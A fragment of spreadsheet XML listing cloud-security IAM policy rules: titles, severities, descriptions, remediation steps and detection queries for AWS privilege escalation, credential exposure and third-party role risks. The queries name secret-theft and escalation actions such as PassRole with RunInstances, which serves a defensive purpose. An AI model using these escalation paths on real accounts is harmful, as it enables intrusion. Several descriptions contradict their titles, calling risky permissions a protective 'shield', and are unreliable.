          <t>be543a73-6d4c-4162-9459-1b83d4f0a158</t>
        </is>
      </c>
      <c r="AI3189" t="inlineStr">
        <is>
          <t>be543a73-6d4c-4162-9459-1b83d4f0a158</t>
        </is>
      </c>
      <c r="AJ3189" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3189" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3190">
      <c r="A3190" t="inlineStr"/>
      <c r="B3190" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3190" s="2" t="inlineStr"/>
      <c r="D3190" t="inlineStr"/>
      <c r="E3190" t="inlineStr"/>
      <c r="F3190" t="inlineStr"/>
      <c r="G3190" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3190" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3190" t="inlineStr">
        <is>
          <t>AWS EC2 with IAM role with destruction permissions for AWS Key Management Service (KMS)</t>
        </is>
      </c>
      <c r="L3190" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3190" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3190" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3190" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3190" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3190" t="inlineStr"/>
      <c r="R3190" t="inlineStr"/>
      <c r="S3190" t="inlineStr"/>
      <c r="T3190" t="b">
        <v>1</v>
      </c>
      <c r="U3190" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3190" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3190" t="inlineStr">
        <is>
          <t>Having an AWS EC2 instance with an IAM role that grants the 'secretsmanager:GetSecretValue' and 'kms:Decrypt' actions can be risky. This combination of permissions allows the instance to retrieve sensitive secrets from Secrets Manager and decrypt encrypted data using AWS Key Management Service (KMS). If unauthorized access or compromise occurs, it could lead to unauthorized retrieval of secrets or decryption of sensitive data, potentially compromising the confidentiality and integrity of the system.</t>
        </is>
      </c>
      <c r="X319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9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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ( 'secretsmanager:GetSecretValue', 'kms:Decrypt' ) AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3190" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3190" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3190" t="inlineStr"/>
      <c r="AD3190" t="b">
        <v>1</v>
      </c>
      <c r="AE3190" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3190" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>00fa3cda-d42a-42ad-a3eb-001f6a1ca04d</t>
        </is>
      </c>
      <c r="AI3190" t="inlineStr">
        <is>
          <t>00fa3cda-d42a-42ad-a3eb-001f6a1ca04d</t>
        </is>
      </c>
      <c r="AJ3190" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3190" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3191">
      <c r="A3191" t="inlineStr"/>
      <c r="B3191" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3191" s="2" t="inlineStr"/>
      <c r="D3191" t="n">
        <v>5</v>
      </c>
      <c r="E3191" t="n">
        <v>19</v>
      </c>
      <c r="F3191" t="n">
        <v>0</v>
      </c>
      <c r="G3191" t="b">
        <v>1</v>
      </c>
      <c r="H31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191" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3191" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3191" t="inlineStr">
        <is>
          <t>User with Administrative Permissions Has Active Access Keys Which Are Unused Over 90 Days</t>
        </is>
      </c>
      <c r="L3191" t="inlineStr">
        <is>
          <t>KEYS_AND_SECRETS</t>
        </is>
      </c>
      <c r="M3191" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3191" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3191" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3191" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3191" t="inlineStr"/>
      <c r="R3191" t="inlineStr"/>
      <c r="S3191" t="inlineStr"/>
      <c r="T3191" t="b">
        <v>1</v>
      </c>
      <c r="U3191" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3191" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3191" t="inlineStr">
        <is>
          <t>Identifies user accounts with administrative permissions for which active access keys exist and have not been used in at least 90 days. \nAccess keys are long-term credentials which allow AWS IAM users programmatic access to resources.\nWhen the user in question possesses administrative permissions, and their access keys are active but not in use, they can potentially be found by an adversary, granting them administrative permissions.</t>
        </is>
      </c>
      <c r="X3191" t="inlineStr">
        <is>
          <t>How to investigate?
1. Sign in to the Cloud Console
2. Browse to the IAM service and search for the affected user
3. Examine the user's permissions as well as their role within your organization and determine whether the principle of least privilege is followed
For remediation, use the following remediation steps:
If access is still required, remove the user's access keys and transition them to AWS's temporary security credentials approach. If any access is deemed unnecessary, remove permissions to minimize the user's access, or remove the user altogether.</t>
        </is>
      </c>
      <c r="Y319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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.access.isAdministrative = true AND source.cloud.accesskey.lastused.days &gt; 90 AND source.cloud.accesskey.activekeys &gt; 0</t>
        </is>
      </c>
      <c r="AA3191" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3191" t="inlineStr">
        <is>
          <t>2024-10-30 17:00:50</t>
        </is>
      </c>
      <c r="AC3191" t="inlineStr"/>
      <c r="AD3191" t="b">
        <v>1</v>
      </c>
      <c r="AE3191" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3191" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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191" t="inlineStr">
        <is>
          <t>b9b7bb65-5bb0-46b4-92b6-5bb298e045b5</t>
        </is>
      </c>
      <c r="AI3191" t="inlineStr">
        <is>
          <t>b9b7bb65-5bb0-46b4-92b6-5bb298e045b5</t>
        </is>
      </c>
      <c r="AJ3191" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3191" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3192">
      <c r="A3192" t="inlineStr"/>
      <c r="B3192" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3192" s="2" t="inlineStr"/>
      <c r="D3192" t="n">
        <v>0</v>
      </c>
      <c r="E3192" t="n">
        <v>0</v>
      </c>
      <c r="F3192" t="n">
        <v>469</v>
      </c>
      <c r="G3192" t="b">
        <v>1</v>
      </c>
      <c r="H319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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3192" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3192" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with Excessive Policies</t>
        </is>
      </c>
      <c r="L3192" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3192" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3192" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3192" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3192" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3192" t="inlineStr"/>
      <c r="R3192" t="inlineStr"/>
      <c r="S3192" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3192" t="b">
        <v>1</v>
      </c>
      <c r="U3192" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3192" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3192" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM policies that contain '*' in the Action or/and Resource section. IAM policies control user and machine permissions in AWS. Using '*' in the Action or Resource section can grant the ability to perform a wide variety of actions on a wide variety of resources. This means an identity with such a policy could perform a range of actions on many resources, depending on the exact policy, potentially bypassing intended security restrictions. This increases the attack surface and potential damage faced should an attacker gain access to such an identity.</t>
        </is>
      </c>
      <c r="X3192" t="inlineStr">
        <is>
          <t>Remediation for a user:
 1. Log in to the AWS console
 2. Navigate to the IAM service
 3. Click on Users
 4. Choose the relevant user
 5. Under 'Permissions policies', find the relevant policy according to the alert details and narrow down the wildcard permissions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narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y319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2" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and grantedby.cloud.policy.isexcessive = true and source.cloud.resource.type IN ('user', 'instance', 'function')</t>
        </is>
      </c>
      <c r="AA3192" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3192" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3192" t="inlineStr"/>
      <c r="AD3192" t="b">
        <v>1</v>
      </c>
      <c r="AE3192" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3192" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>ec3fe7c8-6852-4d06-af85-a7987c3336ce</t>
        </is>
      </c>
      <c r="AI3192" t="inlineStr">
        <is>
          <t>ec3fe7c8-6852-4d06-af85-a7987c3336ce</t>
        </is>
      </c>
      <c r="AJ3192" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3192" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3193">
      <c r="A3193" t="inlineStr"/>
      <c r="B3193" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3193" s="2" t="inlineStr"/>
      <c r="D3193" t="n">
        <v>9</v>
      </c>
      <c r="E3193" t="n">
        <v>14</v>
      </c>
      <c r="F3193" t="n">
        <v>47</v>
      </c>
      <c r="G3193" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3193" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3193" t="inlineStr">
        <is>
          <t>Third-party service account can assume a service account with high privileges</t>
        </is>
      </c>
      <c r="L3193" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3193" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3193" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3193" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3193" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3193" t="inlineStr"/>
      <c r="R3193" t="inlineStr"/>
      <c r="S3193" t="inlineStr"/>
      <c r="T3193" t="b">
        <v>1</v>
      </c>
      <c r="U3193" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3193" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3193" t="inlineStr">
        <is>
          <t>This policy identifies instances where third-party vendors are granted the ability to assume or impersonate roles with high privileges and may allow significant administrative access to your cloud environment. Such permissions can potentially lead to unauthorized access or escalation of privileges, compromising the security posture of your organization.</t>
        </is>
      </c>
      <c r="X3193" t="inlineStr">
        <is>
          <t>How to investigate?
1. Sign in to the AWS Console
2. Navigate to the affected role
3. Examine the role's trust relationship and permissions as well as its use case - if needed reach out to the vendor to validate which permissions are necessary for their functions and why
In order to remove any unnecessary permissions and minimize trusted entities which can assume the role, use the following remediation steps:
To revoke the vendor's access to assume the role altogether, browse to the role in the AWS Console and select "Trust relationships"-&gt;"Edit trust policy". Modify the role's trust relationship as per requirements. To minimize the access the vendor has using the role, under the "Permissions" tab, select the relevant policy and remove unnecessary permissions by either editing the policy or replacing it (notice: editing a managed policy could affect other roles).</t>
        </is>
      </c>
      <c r="Y319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3" t="inlineStr">
        <is>
          <t>config from iam where grantedby.cloud.entity.type IN ( 'role', 'serviceaccount' ) AND action.access.isadministrative = true AND source.cloud.account.isvendor = true</t>
        </is>
      </c>
      <c r="AA3193" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3193" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3193" t="inlineStr"/>
      <c r="AD3193" t="b">
        <v>1</v>
      </c>
      <c r="AE3193" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3193" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>8f4bef95-c86b-4d09-bd8b-c6bce1a88c43</t>
        </is>
      </c>
      <c r="AI3193" t="inlineStr">
        <is>
          <t>8f4bef95-c86b-4d09-bd8b-c6bce1a88c43</t>
        </is>
      </c>
      <c r="AJ3193" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3193" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3194">
      <c r="A3194" t="inlineStr"/>
      <c r="B3194" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3194" s="2" t="inlineStr"/>
      <c r="D3194" t="n">
        <v>0</v>
      </c>
      <c r="E3194" t="n">
        <v>122</v>
      </c>
      <c r="F3194" t="n">
        <v>0</v>
      </c>
      <c r="G3194" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3194" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3194" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; EC2 permissions</t>
        </is>
      </c>
      <c r="L3194" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3194" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3194" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3194" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3194" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3194" t="inlineStr"/>
      <c r="R3194" t="inlineStr"/>
      <c r="S3194" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3194" t="b">
        <v>1</v>
      </c>
      <c r="U3194" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3194" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3194" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and ec2:RunInstances permissions, an adversary can create a new EC2 instance and pass a more privileged role to it. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3194" t="inlineStr">
        <is>
          <t>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9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4" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'ec2:RunInstances' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3194" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3194" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3194" t="inlineStr"/>
      <c r="AD3194" t="b">
        <v>1</v>
      </c>
      <c r="AE3194" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3194" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>3ed41ee9-448e-40fc-951a-21d2ed478e45</t>
        </is>
      </c>
      <c r="AI3194" t="inlineStr">
        <is>
          <t>3ed41ee9-448e-40fc-951a-21d2ed478e45</t>
        </is>
      </c>
      <c r="AJ3194" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3194" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3195">
      <c r="A3195" t="inlineStr"/>
      <c r="B3195" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3195" s="2" t="inlineStr"/>
      <c r="D3195" t="n">
        <v>0</v>
      </c>
      <c r="E3195" t="n">
        <v>31</v>
      </c>
      <c r="F3195" t="n">
        <v>0</v>
      </c>
      <c r="G3195" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3195" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3195" t="inlineStr">
        <is>
          <t>AWS EC2 with IAM role attached has credentials exposure permissions</t>
        </is>
      </c>
      <c r="L3195" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3195" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3195" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3195" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3195" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3195" t="inlineStr"/>
      <c r="R3195" t="inlineStr"/>
      <c r="S3195" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3195" t="b">
        <v>1</v>
      </c>
      <c r="U3195" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3195" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3195" t="inlineStr">
        <is>
          <t>This meticulously tailored IAM policy enforces precise control over vital actions within AWS, specifically honing in on EC2 'instance' resources. By meticulously governing access to a comprehensive range of actions, this policy provides a robust defense mechanism against unauthorized activities, thereby enhancing the overall security posture of your AWS environment</t>
        </is>
      </c>
      <c r="X3195"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9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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN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AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3195" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3195" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3195" t="inlineStr"/>
      <c r="AD3195" t="b">
        <v>1</v>
      </c>
      <c r="AE3195" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3195" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>c5023f4b-f36a-4a21-89fd-250106594635</t>
        </is>
      </c>
      <c r="AI3195" t="inlineStr">
        <is>
          <t>c5023f4b-f36a-4a21-89fd-250106594635</t>
        </is>
      </c>
      <c r="AJ3195" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3195" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3196">
      <c r="A3196" t="inlineStr"/>
      <c r="B3196" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3196" s="2" t="inlineStr"/>
      <c r="D3196" t="n">
        <v>0</v>
      </c>
      <c r="E3196" t="n">
        <v>62</v>
      </c>
      <c r="F3196" t="n">
        <v>0</v>
      </c>
      <c r="G3196" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3196" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3196" t="inlineStr">
        <is>
          <t>AWS Lambda with IAM role attached has credentials exposure permissions</t>
        </is>
      </c>
      <c r="L3196" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3196" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3196" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3196" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3196" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3196" t="inlineStr"/>
      <c r="R3196" t="inlineStr"/>
      <c r="S3196" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3196" t="b">
        <v>1</v>
      </c>
      <c r="U3196" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3196" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3196" t="inlineStr">
        <is>
          <t>This IAM policy serves as an impenetrable shield for your AWS Lambda resources. It empowers your Lambda functions to wield powerful capabilities, seamlessly orchestrating tasks such as secure communication, user authentication, and data protection. This policy acts as a sentinel, guarding against potential attempts to acquire sensitive login tokens, thus ensuring the sanctity of your critical services. With its astute vigilance, your Lambda environment remains impervious to unauthorized access and unwarranted data exposure, bolstering the robustness and integrity of your cloud ecosystem</t>
        </is>
      </c>
      <c r="X3196"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9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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ('chime:createapikey', 'codepipeline:pollforjobs', 'cognito-identity:getopenidtoken', 'cognito-identity:getopenidtokenfordeveloperidentity', 'cognito-identity:getcredentialsforidentity', 'connect:getfederationtoken', 'connect:getfederationtokens', 'ec2:getpassworddata', 'ecr:getauthorizationtoken', 'gamelift:requestuploadcredentials', 'iam:createaccesskey', 'iam:createloginprofile', 'iam:createservicespecificcredential', 'iam:resetservicespecificcredential', 'iam:updateaccesskey', 'lightsail:getinstanceaccessdetails', 'lightsail:getrelationaldatabasemasteruserpassword', 'rds-db:connect', 'redshift:getclustercredentials', 'sso:getrolecredentials', 'mediapackage:rotatechannelcredentials', 'mediapackage:rotateingestendpointcredentials', 'sts:assumerole', 'sts:assumerolewithsaml', 'sts:assumerolewithwebidentity', 'sts:getfederationtoken', 'sts:getsessiontoken') AND source.cloud.service.name = 'lambda'</t>
        </is>
      </c>
      <c r="AA3196" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3196" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3196" t="inlineStr"/>
      <c r="AD3196" t="b">
        <v>1</v>
      </c>
      <c r="AE3196" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3196" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>388202e0-e57b-44cb-ae81-e2d164a67b24</t>
        </is>
      </c>
      <c r="AI3196" t="inlineStr">
        <is>
          <t>388202e0-e57b-44cb-ae81-e2d164a67b24</t>
        </is>
      </c>
      <c r="AJ3196" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3196" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3197">
      <c r="A3197" t="inlineStr"/>
      <c r="B3197" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3197" s="2" t="inlineStr"/>
      <c r="D3197" t="inlineStr"/>
      <c r="E3197" t="inlineStr"/>
      <c r="F3197" t="inlineStr"/>
      <c r="G3197" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3197" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3197" t="inlineStr">
        <is>
          <t>Third-party Service Account With Lateral Movement Through CloudFormation Stack Creation</t>
        </is>
      </c>
      <c r="L3197" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3197" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3197" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3197" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3197" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3197" t="inlineStr"/>
      <c r="R3197" t="inlineStr"/>
      <c r="S3197" t="inlineStr"/>
      <c r="T3197" t="b">
        <v>1</v>
      </c>
      <c r="U3197" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3197" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3197" t="inlineStr">
        <is>
          <t>This policy identifies third-party vendors with permissions to both pass IAM roles ('iam:PassRole') and create CloudFormation stacks ('cloudformation:CreateStack'). These permissions enable vendors to establish new CloudFormation stacks and assign them highly privileged roles. Such actions could allow these external entities to escalate their privileges within your AWS environment, posing a serious security risk</t>
        </is>
      </c>
      <c r="X3197" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2. Navigate to the IAM pane, and search for the relevant role
 3. Remove the third-party account from the role's trust policy to revoke its access to the role.</t>
        </is>
      </c>
      <c r="Y319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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ( 'iam:PassRole', 'cloudformation:CreateStack', 'cloudformation:DescribeStacks') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist AND source.cloud.account.isvendor = true</t>
        </is>
      </c>
      <c r="AA3197" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3197" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3197" t="inlineStr"/>
      <c r="AD3197" t="b">
        <v>1</v>
      </c>
      <c r="AE3197" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3197" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>6c67217a-2f0f-4afd-b07e-17d640b300cc</t>
        </is>
      </c>
      <c r="AI3197" t="inlineStr">
        <is>
          <t>6c67217a-2f0f-4afd-b07e-17d640b300cc</t>
        </is>
      </c>
      <c r="AJ3197" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3197" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3198">
      <c r="A3198" t="inlineStr"/>
      <c r="B3198" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3198" s="2" t="inlineStr"/>
      <c r="D3198" t="n">
        <v>0</v>
      </c>
      <c r="E3198" t="n">
        <v>63</v>
      </c>
      <c r="F3198" t="n">
        <v>0</v>
      </c>
      <c r="G3198" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3198" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3198" t="inlineStr">
        <is>
          <t>AWS Lambda Function with data destruction permissions</t>
        </is>
      </c>
      <c r="L3198" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3198" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3198" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3198" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3198" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3198" t="inlineStr"/>
      <c r="R3198" t="inlineStr"/>
      <c r="S3198" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3198" t="b">
        <v>1</v>
      </c>
      <c r="U3198" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3198" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3198" t="inlineStr">
        <is>
